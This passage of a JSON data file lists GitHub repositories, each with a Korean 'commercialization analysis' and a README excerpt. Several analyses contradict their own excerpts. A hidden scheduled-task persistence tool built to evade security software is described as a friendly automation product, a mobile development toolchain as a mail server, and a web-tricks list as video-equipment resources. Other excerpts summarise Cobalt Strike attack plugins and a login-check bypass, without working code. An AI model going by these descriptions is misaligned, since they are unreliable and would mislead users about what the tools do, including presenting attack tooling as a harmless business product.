![](https://badgen.net/github/stars/z1un/Z1-AggressorScripts)\n\n适用于Cobalt Strike 3.x & 4.x 的插件。\n\n2021.05.30 更新：\n- 所有程序只提供32位。\n- 其他若干更新。\n\n2021.05.03 更新:\n\n- 去除提权和日志清理模块，这部分可以使用其他的插件或者梼杌等。\n- 默认上传目录替换为`C:\\Users\\Public`，相较而言它比`C:\\Windows\\Temp`更加简洁。\n- fscan，frp等软件更新，并新增[HackBrowserData](https://github.com/moonD4rk/HackBrowserData)工具。\n\n2020.12.20 更新：\n\n- 更新[fscan](https://github.com/shadow1ng/fscan)工具。\n\n2020.11.21 更新：\n\n- 辅助模块的zip打包更换成uknow师傅的[SharpZip](https://github.com/uknowsec/SharpZip)，内存加载无需上传。\n- 权限维持模块新增创建自启动运行，包括添加注册表，添加启动文件夹，创建启动服务三种方式。\n\n2020.11.20 更新：\n\n- 内网穿透模块新增支持nps。\n\n- frp由之前的upx压缩版本换成未压缩版，upx压缩后的frp32位和nps都会在360上报毒，索性全部换成原版。但是这就项目导致体积由20几M增加到了30几M。\n\n  windows-npc64位通过cs上传后运行会报错，不知道是不是我个人环境问题，所以npc只上传32位，不影响使用。\n\n  \n\n![image-20201119120243146](https://oss.zjun.info/zjun.info/20201119120244.png)\n\n\n\n\n## 提权\n\n1. [watson](http","composite_score":0.5048,"license_safety_tag":"unknown"},{"name":"waylybaye/XcodeCleaner","github_url":"https://github.com/waylybaye/XcodeCleaner","stars":8,"language":"Objective-C","license":"GPL-3.0","abandonment_months":80,"description":"# XcodeCleaner 분석\n\n## 왜 보물인가\n맥 사용자들이 쌓여있는 불필요한 개발 파일들을 자동으로 삭제해 컴퓨터 저장공간을 확보할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 형태로 맥 사용자들에게 자동 정리 기능을 제공하는 클라우드 서비스\n2. **내부 업무 도구**: 개발팀이 있는 회사에서 직원들의 개","readme_excerpt":"# Cleaner for Xcode\n\nThe new SwiftUI version is here https://github.com/waylybaye/XcodeCleaner-SwiftUI\n\n---\n\n![Screen Shot](./screenshot.png \"Screenshot\")\n\n\nThis app helps you to make your Xcode faster by removing unwanted and deprecated files.\n\nYou can run cleaner weekly or monthly to keep your developer folder health and to save more disk space.\n\n\n这个应用可以帮助你清除遗留以及废弃文件，从而极大的节省硬盘空间. 你可以每月或者每周运行一次进行清理。\n\n\n\n## Download\n\nCleaner for Xcode is available on Mac App Store now, you can get it using the link below. You can also build it by yourself, please refer to `Build` section.\n\n[![Download on App Store](https://www.apple.com/itunes/link/images/link-badge-appstore.png \"View on App Store\")\n](https://itunes.apple.com/app/cleaner-for-xcode/id1296084683)\n\n\n\n## Build\n\nMake sure you have latest `node` and `npm or yarn`  and `watchman` installed, you can install them using `homebrew`\n\n1. Run `npm install` or `yarn` in project directory.\n2. Run `open macos/XcodeCleaner.xcodeproj` to open Xcode projec","composite_score":0.5048,"license_safety_tag":"restricted"},{"name":"0x727/SchTask_0x727","github_url":"https://github.com/0x727/SchTask_0x727","stars":14,"language":"C#","license":"MIT","abandonment_months":58,"description":"# SchTask_0x727 - 상용화 분석 보고서\n\n## 왜 보물인가\n일반 사용자들이 복잡한 자동 작업을 쉽게 설정하고 관리할 수 있는 친화적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 회사의 반복적인 업무(일일 보고서 생성, 정기 알림 발송 등)를 자동화하는 클라우드 플랫폼으로 제공\n2. **내부 업무 도구**: 대기","readme_excerpt":"\n![logo](./imgs/logo.png)\n\n# SchTask\n\n| 类别 | 说明 |\n| ---- | --- |\n| 作者 | [AnonySec](https://github.com/An0nysec) |\n| 团队 | [0x727](https://github.com/0x727) 未来一段时间将陆续开源工具 |\n| 定位 | 权限维持，内存加载 |\n| 语言 | C# |\n| 功能 | 创建隐藏的计划任务，进行权限维持 |\n\n## 什么是 SchTask ?\n\n利用 Windows API，工具化创建隐藏的计划任务，同时绕过安全软件的阻断，达到持久控制。\n\n## 实现原理 ?\n\n### Steps\n\n1. 选择主机随机进程名作为计划任务程序文件名\n2. 将计划任务程序文件复制到 `%AppData%\\Microsoft\\Windows\\Themes\\` 中\n3. 创建的计划任务名取同一随机进程名\n4. 计划任务触发器以分钟为单位，无限期持续\n5. 更改 Index、删除 SD 的键值，隐藏计划任务对应的 XML 文件\n6. ~~删除已添加的计划任务~~\n\n### Articles\n\n更多技术细节，请查看  [Windows计划任务的进阶](https://payloads.cn/2021/0805/advanced-windows-scheduled-tasks.html)\n\n## 开始体验\n\n### Git下载安装\n\n```bash\n$ git clone https://github.com/0x727/SchTask_0x727.git\n```\n\n> 注：直接下载 [Release](https://github.com/0x727/SchTask_0x727/releases/) 版本快速使用，已经将 `Microsoft.Win32.TaskScheduler.dll` 打包到 SchTask.exe 中。\n\n## 使用方法\n\n### SchTask.exe   (.NET Framework 2.0)\n\n```\nC:\\>SchTask.exe\n  ___       _____ ____ _____\n / _ \\__  _|___  |___ \\___  |\n| | | \\ \\/ /  / /  __)|  / /\n| |_|","composite_score":0.5048,"license_safety_tag":"safe"},{"name":"zu1k/good-mitm","github_url":"https://github.com/zu1k/good-mitm","stars":12,"language":"Rust","license":"MIT","abandonment_months":34,"description":"# good-mitm 프로젝트 분석\n\n## 왜 보물인가\n인터넷 통신을 중간에서 검사하고 제어할 수 있는 기술로, 기업의 보안 감시나 네트워크 분석이 필요한 상황에서 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 네트워크 보안 감시 SaaS**: 직원의 인터넷 사용을 모니터링하고 위험한 접속을 차단하는 월 구독 서비스\n2. **API 보안 검사","readme_excerpt":"# Good Man in the Middle\n\n[![GitHub stars](https://img.shields.io/github/stars/zu1k/good-mitm)](https://github.com/zu1k/good-mitm/stargazers)\n[![GitHub forks](https://img.shields.io/github/forks/zu1k/good-mitm)](https://github.com/zu1k/good-mitm/network)\n[![Release](https://img.shields.io/github/release/zu1k/good-mitm)](https://github.com/zu1k/good-mitm/releases)\n[![GitHub issues](https://img.shields.io/github/issues/zu1k/good-mitm)](https://github.com/zu1k/good-mitm/issues)\n[![Build](https://github.com/zu1k/good-mitm/actions/workflows/build-test.yml/badge.svg)](https://github.com/zu1k/good-mitm/actions/workflows/build-test.yml)\n[![GitHub license](https://img.shields.io/github/license/zu1k/good-mitm)](https://github.com/zu1k/good-mitm/blob/master/LICENSE)\n[![Docs](https://img.shields.io/badge/docs-read-blue.svg?style=flat)](https://good-mitm.zu1k.com/)\n\n#### [中文版](https://github.com/zu1k/good-mitm/blob/master/README_zh.md)\n\nRule-based MITM engine. Rewriting, redirecting and rejecting o","composite_score":0.5047,"license_safety_tag":"safe"},{"name":"MBoxPlus/mbox","github_url":"https://github.com/MBoxPlus/mbox","stars":58,"language":"Ruby","license":"GPL-2.0","abandonment_months":45,"description":"# MBoxPlus/mbox 분석 보고서\n\n## 왜 보물인가\n메일 서버를 직접 관리하고 운영할 수 있는 오픈소스 솔루션으로, 기업이 외부 메일 서비스 의존도를 줄이고 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 내부 메일 시스템 SaaS**\n- 중소기업들을 대상으로 자체 메일 서버 구축 및 관리 서비스 제공\n\n**2. 클라우드 호","readme_excerpt":"# MBox - Toolchain for Mobile App Development\n\n![Version](https://img.shields.io/github/v/release/mboxplus/mbox)\n![Total Downloads](https://img.shields.io/github/downloads/mboxplus/mbox/total)\n![License](https://img.shields.io/github/license/mboxplus/mbox)\n\n[简体中文](./README-CN.md) | **English**\n\nMBox is a toolchain App on macOS which focuses on Mobile App Development. It can help developers manage environments, dependencies, or repositories. Besides, developers can customize their tools or workflow by developing an MBox Plugin.\n\n## The Repository\n\nThis repository is the repo without any source code of MBox. It is where we publish products, milestones, and work plans. Also, our users search documents and submit issues here.\n\nMBox uses plug-in technology. By adding plug-ins, MBox can continuously expand its capabilities.\n\nThere are some core plugin:\n\n1. [MBoxCore](https://github.com/MBoxPlus/mbox-core) The MBox kernel, load plugins and distribut commands.\n1. [MBoxGit](https://github.com/M","composite_score":0.5047,"license_safety_tag":"restricted"},{"name":"2024-SANDHYA/Blood-Buddy","github_url":"https://github.com/2024-SANDHYA/Blood-Buddy","stars":5,"language":"CSS","license":"MIT","abandonment_months":27,"description":"# Blood-Buddy 분석 보고서\n\n## 왜 보물인가\n혈액 기부자와 필요한 환자를 연결하는 생명 구조 플랫폼으로, 사회적 영향력이 큰 실제 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n1. **혈액 기부 중개 SaaS**: 병원·헌혈의집이 구독하여 긴급 혈액 수혈이 필요한 환자 정보를 기부자에게 실시간 공지하는 서비스\n2. **보건당국 내부 도구**","readme_excerpt":"# Blood-Buddy 🏥\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE) ![Open Source Love](https://badges.frapsoft.com/os/v2/open-source.svg?v=103)  ![PRs Welcome](https://img.shields.io/badge/PRs-welcome-green.svg)\n\n![image](https://user-images.githubusercontent.com/75671152/132247486-0eb918aa-7f5e-4042-8380-82ce77d4d289.png)\n\n**Blood Buddy** is a website that offers blood donation services to anyone in need. The website works :\n\n1. Register on the website.\n2. Add your address.\n3. Website can track nearby blood bank.\n4. Get updates.\n\n<hr>\n\n#### Tech-Stack used :\n\n<!--   <p align =\"center\"><code> -->\n  ![HTML 5](https://img.shields.io/badge/HTML5-E34F26?style=for-the-badge&logo=html5&logoColor=white)\n  ![CSS3](https://img.shields.io/badge/CSS3-1572B6?style=for-the-badge&logo=css3&logoColor=white)\n  ![JS](https://img.shields.io/badge/JavaScript-323330?style=for-the-badge&logo=javascript&logoColor=F7DF1E)\n<!--   <img height=\"30\" src=\"https://raw.githubusercontent","composite_score":0.5047,"license_safety_tag":"safe"},{"name":"zu1k/copy-translator","github_url":"https://github.com/zu1k/copy-translator","stars":9,"language":"Rust","license":"unknown","abandonment_months":40,"description":"# copy-translator 분석\n\n## 왜 보물인가\n복사한 텍스트를 자동으로 번역해주는 도구로, 외국 자료를 자주 다루는 사람들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 번역 보조 프로그램으로 직장인들에게 판매\n2. **내부 업무 도구**: 글로벌 기업의 직원들이 다국어 자료 처리 시","readme_excerpt":"# Translator\n\nTranslator 是使用Rust编写的翻译小工具\n\n## 特点\n\n- 轻量\n- 自动去除多余的换行和断句，优化PDF翻译体验\n- 选中即翻译(划词翻译)，专注论文阅读\n\n## 使用说明\n\n工具仅一个exe，启动后会驻留后台，选中文本后按 `alt+q` 唤起翻译界面，`esc`关闭界面，`ctrl+shift+d`完全退出\n\n在界面开启的情况下，可以通过选中文本触发翻译行为，无需快捷键，俗称“划词翻译”\n\n![使用截图](./res/pic.png)\n\n## Copyright\n\n**Translator** © [zu1k](https://github.com/zu1k), Copyright reserved.\n","composite_score":0.5046,"license_safety_tag":"unknown"},{"name":"miroslavpejic85/p2p","github_url":"https://github.com/miroslavpejic85/p2p","stars":5,"language":"C#","license":"MIT","abandonment_months":24,"description":"# miroslavpejic85/p2p 저장소 분석\n\n## 왜 보물인가\n개인과 개인이 직접 거래할 수 있는 기술을 제공하여, 중간 플랫폼 없이 서로 연결하고 파일·데이터를 주고받을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개인 간 파일 공유 앱이나 메시지 앱으로 제공하여 구독료 수익 창출\n2. **내부 업무 도구**: ","readme_excerpt":"<p align=\"center\">\n  <img src=\"ico/p2p.ico\" />\n</p>\n\n# <p align=\"center\">P2P Remote Desktop</p>\n\n<p align=\"center\">Remote Desktop P2P based - Portable, No Configuration or Installation Needed.</p>\n\n<hr />\n\n## How it works\n\n- Compile and Open `p2p.exe` as admin in 2 different PC's.\n\n![p2p-exe](img/p2p-exe.png)\n\n- Copy the `My Lan or Wan IP` and communicate it to other peer and vice versa.\n\n![p2p-connection](img/p2p-connection.png)\n\n- The 2 peers have now the 2 endpoint to connect to, so press on both `Connect`.\n- The 2 peers now are able to `sent messages` or take the `Remote Desktop Control` between them.\n\n![p2p-remote-desktop](img/p2p-remote-desktop.png)\n\n</br >\n\nIt's use [UDT protocol](https://en.wikipedia.org/wiki/UDP-based_Data_Transfer_Protocol)\nand thanks to `rendezvous` connection, it should be able to `bypass most firewall rules`, like a small concept of `TeamViewer` at 0 cost!\n\n![p2p-logic](img/p2p-logic.png)\n\n## Note\n\nThe app doesn't have a `digital signature` being an open s","composite_score":0.5046,"license_safety_tag":"safe"},{"name":"GuitarML/NeuralPi","github_url":"https://github.com/GuitarML/NeuralPi","stars":98,"language":"C++","license":"GPL-3.0","abandonment_months":29,"description":"# NeuralPi 상용화 분석\n\n## 왜 보물인가\n기타 음향을 인공지능으로 실시간 변환하는 기술로, 음악 제작자들이 비싼 음향 장비 없이도 전문가 수준의 사운드를 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 기타음향 변환 플랫폼**\n- 음악 제작자가 웹사이트에서 기타 녹음물을 업로드하면 AI가 다양한 음향 효과","readme_excerpt":"# NeuralPi\r\n\r\n[![CI](https://github.com/GuitarML/NeuralPi/actions/workflows/cmake.yml/badge.svg)](https://github.com/GuitarML/NeuralPi/actions/workflows/cmake.yml) [![License: GPL v3](https://img.shields.io/badge/License-GPLv3-brightgreen.svg)](https://www.gnu.org/licenses/gpl-3.0) [![Downloads](https://img.shields.io/github/downloads/GuitarML/NeuralPi/total)](https://somsubhra.github.io/github-release-stats/?username=GuitarML&repository=NeuralPi&page=1&per_page=30)\r\n\r\nNeuralPi is a guitar pedal using neural networks to emulate real amps and pedals on a Raspberry Pi 4. The NeuralPi software is a VST3 plugin built with JUCE, which can be run as a normal audio plugin or cross-compiled to run on the Raspberry Pi 4 with [Elk Audio OS](https://elk.audio/). The NeuralPi includes model selection, EQ, and gain/volume controls from a remote instance of the plugin over WiFi. The pedal runs high quality amp/pedal models on an economical DIY setup, costing around $120 for hardware to build yoursel","composite_score":0.5046,"license_safety_tag":"restricted"},{"name":"hit-thusz-RookieCJ/CSSummerCamp2021","github_url":"https://github.com/hit-thusz-RookieCJ/CSSummerCamp2021","stars":9,"language":"","license":"unknown","abandonment_months":53,"description":"# CSSummerCamp2021 사업화 분석\n\n## 왜 보물인가\n학생들의 코딩 학습 과정을 체계적으로 기록하고 관리할 수 있는 교육 자료 모음으로, 프로그래밍 입문자를 위한 실전 학습 가이드 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초보자 대상 프로그래밍 강좌 제공 서비스에 커리큘럼과 교재로 활용\n2. **기업 신입 교","readme_excerpt":"# CSSummerCamp2021\n\n​\t关于**2021年CS保研夏令营通知公告**的汇总。欢迎大家积极分享夏令营信息，资瓷一下互联网精神吼不吼啊？（本仓库将随各校通知的发布实时更新，具体形式可参见往年：[CSSummerCamp2020](https://github.com/hcy226/CSSummerCamp2020)）\n\n​\t**保研夏令营已经基本结束，在这里恭喜已经上岸的同学；没拿到offer的同学也不必灰心，移步[2021预推免仓库](https://github.com/hit-thusz-RookieCJ/CSYuTuiMian2021)，预推免还有很多机会！**\n\n​\t另附[保研小白必看的往年经验贴大全，建议全部看完至少掌握保研流程，否则容易问一些很显然的问题](https://github.com/richardodliu/CS-BAOYAN)\n\n\n\n## [夏令营开奖情况](https://docs.qq.com/sheet/DVXJaRHhQY3N1Um5B)\n\n# 清华大学\n\n~~【报名截止: 2021.4.15】[清华大学自动化系智能与网络化系统研究中心2021年招生夏令营](https://mp.weixin.qq.com/s/xyoqcOVdxctfmCUKGiPGwg)~~\n\n~~【报名截止: 2021.5.27】[清华大学交叉信息研究院](https://mp.weixin.qq.com/s/GmlFZEHiIJdtymOqgVPx2w)~~\n\n~~【报名截止: 2021.5.28】[清华大学软件学院2021年优秀大学生夏令营报名通知](https://www.thss.tsinghua.edu.cn/article/5ncK5Z9wH9)~~\n\n~~【报名截止: 2021.6.7】[清华大学第四届（2021年）“计算法学”夏令营即日起接收报名申请](http://www.law.tsinghua.edu.cn/info/1135/12770.htm)~~\n\n~~【报名截止: 2021.6.15】[清华大学车辆与运载学院2021年全国优秀大学生暑期夏令营通知](https://mp.weixin.qq.com/s/YO1RNjQiH0_x9LgRH5oWDw)~~\n\n~~【报名截止: 2021.6.15】[清华大学计算机科学","composite_score":0.5045,"license_safety_tag":"unknown"},{"name":"adamyi/wechrome","github_url":"https://github.com/adamyi/wechrome","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":33,"description":"# adamyi/wechrome 분석 보고서\n\n## 왜 보물인가\nWeChat(중국의 대표 메신저)을 웹 브라우저에서 사용할 수 있게 만드는 도구로, 중국 비즈니스를 하는 사람들이 컴퓨터에서 편하게 업무를 볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 수출입업체를 위한 \"WeChat 웹 워크스페이스\" 월 구독형 클라우드 서비","readme_excerpt":"# WeChrome\n\nA Chrome extension to unblock Web Version of WeChat\n\n\nTired of Tencent for not providing Linux version of WeChat? Run into the following error while logging into web version of WeChat?\n\n```\nTo protect your account, logging in to WeChat via the web has been suspended. Use WeChat for Windows or WeChat for Mac to log in on a computer. Download WeChat for Windows or Mac at http://wechat.com.\n```\n\nThis extension bypasses this check!\n","composite_score":0.5045,"license_safety_tag":"unknown"},{"name":"Mustard404/Savior","github_url":"https://github.com/Mustard404/Savior","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":49,"description":"# Savior 저장소 분석\n\n## 왜 보물인가\n저장소 정보가 제한적이어서 구체적인 가치를 판단하기 어렵지만, 7개의 관심도와 최근 활동 이력으로 보아 특정 문제를 해결하는 솔루션으로 보입니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 팀의 반복적인 작업을 자동화하고 효율성을 높이는 솔루션으로 판매\n- **API 판매**: 다른 회사들이 자신","readme_excerpt":"<div align=\"center\">\n# 🍋 Savior 渗透测试报告自动生成工具   \n\n[![License](https://img.shields.io/badge/license-GPLv3-blue.svg)](./LICENSE)\n[![](https://img.shields.io/badge/python-3.5+-yellow.svg)](https://www.python.org/)\n[![](https://img.shields.io/badge/docker-latest-blue.svg)](https://www.docker.com/) \n[![](https://img.shields.io/github/stars/Mustard404/Savior.svg?label=Stars&style=social?style=plastic)](https://github.com/Mustard404/Savior/) \n[![](https://img.shields.io/github/issues/Mustard404/Savior.svg)](https://github.com/Mustard404/Savior/)\n\n </div>\n \n## 重要更新，修复nginx配置错误导致任意文件读取。\n\n进入容器内，修改/etc/nginx/sites-enabled/savior.conf文件如下：\n\nhttps://github.com/Mustard404/Savior/blob/b72151d6adaa9bf12e284198e0b0b11fb80d6341/docker/savior.conf#L27-L29 \n\n感谢[signfind](https://github.com/signfind)反馈。\n\n##  🛠 作者\n\n**Mustard404**    \n[https://sec404.cn](https://sec404.cn)  \n\n## 🎈 背景\n\n在安服仔的日子里，发现下面的人输出的渗透测试报告结果不规范，主要在报告质量、内容、字体、及修复方案中存在诸多问题，而且大部分安服仔需要对每次的项目结果进行统计整理，方便后续跟踪复测。  \n因此研发了Savior-渗透测试报告辅助生成系统，起这个名字也是","composite_score":0.5045,"license_safety_tag":"unknown"},{"name":"jlongster/absurd-sql","github_url":"https://github.com/jlongster/absurd-sql","stars":13,"language":"JavaScript","license":"MIT","abandonment_months":34,"description":"# absurd-sql 상용화 분석\n\n## 왜 보물인가\n웹 브라우저에서 데이터베이스처럼 복잡한 데이터를 직접 저장하고 검색할 수 있게 해주는 기술로, 인터넷이 끊겨도 앱이 작동하는 오프라인 웹서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **협업 문서 도구(SaaS)**: 구글 문서처럼 인터넷이 불안정해도 작업 내용이 손실되지 않는 온라인 에","readme_excerpt":"\nThis is an absurd project.\n\nIt implements a backend for [sql.js](https://github.com/sql-js/sql.js/) (sqlite3 compiled for the web) that treats IndexedDB like a disk and stores data in blocks there. That means your sqlite3 database is persisted. And not in the terrible way of reading and writing the whole image at once -- it reads and writes your db in small chunks.\n\nIt basically stores a whole database into another database. Which is absurd.\n\n[See the demo](https://priceless-keller-d097e5.netlify.app/). You can also view an entire app using this [here](https://app-next.actualbudget.com/?wtf_source=absurd).\n\nYou should also read [this blog post](https://jlongster.com/future-sql-web) which explains the project in great detail.\n\nIf you like my work, feel free to [buy me a coffee!](https://www.buymeacoffee.com/jlongster)\n\n## How do I use it?\n\nYou can check out the [example project](https://github.com/jlongster/absurd-example-project) to get started. Or follow the steps below:\n\nFirst you i","composite_score":0.5045,"license_safety_tag":"safe"},{"name":"ZsgsDesign/NOJ","github_url":"https://github.com/ZsgsDesign/NOJ","stars":17,"language":"PHP","license":"MIT","abandonment_months":26,"description":"# NOJ 저장소 분석\n\n## 왜 보물인가\n프로그래밍 문제를 출제하고 채점하는 온라인 판정 시스템으로, 교육기관과 기업의 코딩 시험 플랫폼으로 즉시 활용 가능한 완성도 높은 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 대학교와 부트캠프가 월 구독으로 학생 코딩 과제 채점 자동화 플랫폼 운영\n- **내부 업무 도구**: 대형 IT 기","readme_excerpt":"# NOJ  - Automatic Algorithm Test Platform\n\n![NOJ](/noj_banner.png)\n\nNOJ's another online judge platform, stands for NJUPT Online Judge. It's written in PHP, GO, Python and other function-supporting languages and supports both online judges and virtual judges, we called it **mixed judge**.\n\n[![Build Status](https://img.shields.io/scrutinizer/build/g/ZsgsDesign/NOJ.svg?style=flat-square)](https://scrutinizer-ci.com/g/ZsgsDesign/NOJ/build-status/master)\n![License](https://img.shields.io/github/license/ZsgsDesign/NOJ.svg?style=flat-square)\n[![Scrutinizer Code Quality](https://img.shields.io/scrutinizer/g/ZsgsDesign/NOJ.svg?style=flat-square)](https://scrutinizer-ci.com/g/ZsgsDesign/NOJ/?branch=master)\n[![FOSSA Status](https://img.shields.io/badge/license%20scan-passing-green.svg?style=flat-square)](https://app.fossa.io/projects/git%2Bgithub.com%2FZsgsDesign%2FCodeMaster?ref=badge_shield)\n![GitHub repo size](https://img.shields.io/github/repo-size/ZsgsDesign/NOJ.svg?style=flat-square)\n![Gi","composite_score":0.5045,"license_safety_tag":"safe"},{"name":"trojanowski/react-apollo-hooks","github_url":"https://github.com/trojanowski/react-apollo-hooks","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":42,"description":"# react-apollo-hooks 가치 분석\n\n## 왜 보물인가\n웹 개발자들이 데이터를 쉽게 가져오고 관리할 수 있게 도와주는 개발 도구로, 현대적인 웹 애플리케이션 개발의 필수 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 데이터 동기화가 필요한 협업 도구나 프로젝트 관리 플랫폼의 빠른 개발\n- **내부 업무 도구**: 기","readme_excerpt":"# react-apollo-hooks\n\nThis library is deprecated. Please migrate to the \n[official React Apollo Hooks](https://www.npmjs.com/package/@apollo/react-hooks).\n\n---\n\nUse [Apollo Client](https://github.com/apollographql/apollo-client) as React\n[hooks](https://reactjs.org/docs/hooks-intro.html).\n\n[![CircleCI](https://circleci.com/gh/trojanowski/react-apollo-hooks.svg?style=svg)](https://circleci.com/gh/trojanowski/react-apollo-hooks)\n\n# Installation\n\n`npm install react-apollo-hooks`\n\nOr if using [yarn](https://yarnpkg.com/en/)\n\n\n`yarn add react-apollo-hooks`\n\n# Example\n\n<https://codesandbox.io/s/8819w85jn9> is a port of Pupstagram sample app to\nreact-apollo-hooks.\n\n# API\n\n## ApolloProvider\n\nSimilar to\n[ApolloProvider from react-apollo](https://www.apollographql.com/docs/react/essentials/get-started.html#creating-provider).\nBoth packages can be used together, if you want to try out using hooks and\nretain `Query`, `Mutation`, `Subscription`, etc. HOCs from `react-apollo`\nwithout having to rewri","composite_score":0.5044,"license_safety_tag":"safe"},{"name":"tnfe/awesome-blackmagic","github_url":"https://github.com/tnfe/awesome-blackmagic","stars":7,"language":"","license":"unknown","abandonment_months":51,"description":"# awesome-blackmagic 분석\n\n## 왜 보물인가\n영상 편집과 방송 장비 관련 자료들을 한곳에 모아놓은 컬렉션으로, 창작자들이 고품질 영상 제작에 필요한 도구와 정보를 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 영상 편집자를 위한 구독형 강좌/튜토리얼 플랫폼\n- **내부 업무 도구**: 방송국·영상 제작사","readme_excerpt":"\n\n# awesome-blackmagic\n\n![blackmagic-banner](https://raw.githubusercontent.com/Tnfe/awesome-blackmagic/master/assets/banner.png \"awesome-blackmagic\")\n\n我们在web开发过程中，都会或多或少遇到过一些非常规需求，需要巧妙的应用我们所掌握的技术那不为人知的一面，这类奇技淫巧，我们称之为黑魔法。awesome-blackmagic项目将为web开发人员定期分享这些神奇的技术应用。\n\n<br />\n\n## :tophat:魔法说明\n\n<a href=\"#black\">黑魔法：js/ts/es6、7</a>\n\n<a href=\"#blue\">蓝魔法：react/vue/angular等前端框架</a>\n\n<a href=\"#green\">绿魔法：nodejs</a>\n\n<a href=\"#red\">红魔法：web安全</a>\n\n<a href=\"#purple\">紫魔法：工具</a>\n\n<a href=\"#yellow\">黄魔法：html/css</a>\n\n<a href=\"#orange\">橙魔法：golang\\php等</a>\n\n<br />\n\n##  :clap: 欢迎参与​\n\n如果你有兴趣参与，可以把发现的有价值的信息、文章等在[Issues](https://github.com/Tnfe/awesome-blackmagic/issues)里提给我们，记得写上推荐的理由哈，我们会尽快处理。有建议和意见也欢迎到[Issues](https://github.com/Tnfe/awesome-blackmagic/issues)提出。\n\n<br />\n\n## \n## <img src=\"https://raw.githubusercontent.com/Tnfe/awesome-blackmagic/master/assets/black.png\" width=\"35\" id=\"black\" style=\"margin-right:5px; vertical-align:middle;\">黑魔法：\n- [JavaScript奇技淫巧45招](https://www.jianshu.com/p/39a90f60c276)\n","composite_score":0.5044,"license_safety_tag":"unknown"},{"name":"brunosimon/keppler","github_url":"https://github.com/brunosimon/keppler","stars":11,"language":"JavaScript","license":"mit","abandonment_months":48,"description":"","readme_excerpt":"# [Keppler](https://brunosimon.github.io/keppler/)\n\n> Real time code sharing for your lectures and presentations.\n\n[Website](https://brunosimon.github.io/keppler/)\n\n## What is keppler\n\nStart keppler inside your project folder, share the URL with your audience and start coding.\nAny time you save a file, viewers will receive those changes. They can browse through the files, go back in history, copy the code, download the project, preview images, chat with other viewers, ask the presenter to slow down, etc.\n\n<img width=\"700\" src=\"https://github.com/brunosimon/keppler/raw/master/resources/screenshots/screen-project-1.png\" alt=\"Keppler screen\">\n<img width=\"700\" src=\"https://github.com/brunosimon/keppler/raw/master/resources/screenshots/screen-project-2.png\" alt=\"Keppler screen\">\n<img width=\"700\" src=\"https://github.com/brunosimon/keppler/raw/master/resources/screenshots/screen-project-3.png\" alt=\"Keppler screen\">\n\n## User instructions\n\n#### 1 - Install Keppler globally\n\nYou must have [NodeJ","composite_score":0.5044,"license_safety_tag":"safe"},{"name":"CyberSecurityUP/Awesome-Malware-Analysis-Reverse-Engineering","github_url":"https://github.com/CyberSecurityUP/Awesome-Malware-Analysis-Reverse-Engineering","stars":5,"language":"","license":"unknown","abandonment_months":46,"description":"# CyberSecurityUP/Awesome-Malware-Analysis-Reverse-Engineering 평가\n\n## 왜 보물인가\n컴퓨터 바이러스를 분석하고 대응하는 보안 전문가들이 필요로 하는 도구와 지식을 한곳에 모아놓은 리소스 모음집입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업의 악성코드 탐지 및 분석 시스템으로 구독 기","readme_excerpt":"# Malware and Reverse Engineering Complete Collection by Joas\n\n## What is?\n\n- https://www.crowdstrike.com/cybersecurity-101/malware/malware-analysis/\n- https://en.wikipedia.org/wiki/Malware_analysis\n- https://sectigostore.com/blog/malware-analysis-what-it-is-how-it-works/\n- https://digitalguardian.com/blog/what-malware-analysis-defining-and-outlining-process-malware-analysis\n\n- https://www.sans.org/reading-room/whitepapers/malicious/paper/2103\n\n- https://www.sans.org/blog/how-you-can-start-learning-malware-analysis/\n\n- https://www.logsign.com/blog/malware-analysis-things-you-should-know/\n\n- https://www.first.org/global/sigs/malware/\n\n- https://www.opswat.com/solutions/malware-analysis\n\n- https://medium.com/techiepedia/malware-analysis-the-art-of-understanding-malware-ffc5e69feb3e\n\n- https://www.jigsawacademy.com/blogs/cyber-security/malware-analysis/\n\n- https://astromachineworks.com/what-is-reverse-engineering/#:~:text=Reverse%20engineering%2C%20sometimes%20called%20back,individual%20c","composite_score":0.5044,"license_safety_tag":"unknown"},{"name":"sunset1995/DirectVoxGO","github_url":"https://github.com/sunset1995/DirectVoxGO","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":37,"description":"# DirectVoxGO 저장소 분석\n\n## 왜 보물인가\n3차원 공간을 컴퓨터가 이해하고 그려내는 기술로, 게임·영상·로봇 산업에서 수십억 원대 시장을 형성하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **3D 스캔 SaaS**: 스마트폰으로 찍은 사진을 3D 모델로 변환하는 웹 서비스\n2. **건축사무소 내부 도구**: 건물 도면을 자동으로 3D 모델링","readme_excerpt":"# DirectVoxGO\n\nDirect Voxel Grid Optimization (CVPR2022 Oral, [project page](https://sunset1995.github.io/dvgo/), [DVGO paper](https://arxiv.org/abs/2111.11215), [DVGO v2 paper](https://arxiv.org/abs/2206.05085)).\n\nhttps://user-images.githubusercontent.com/2712505/153380311-19d6c3a1-9130-489a-af16-ad36c78f10a9.mp4\n\nhttps://user-images.githubusercontent.com/2712505/153380197-991d1689-6418-499c-a192-d757f9a64b64.mp4\n\n### Custom casual capturing\nA [short 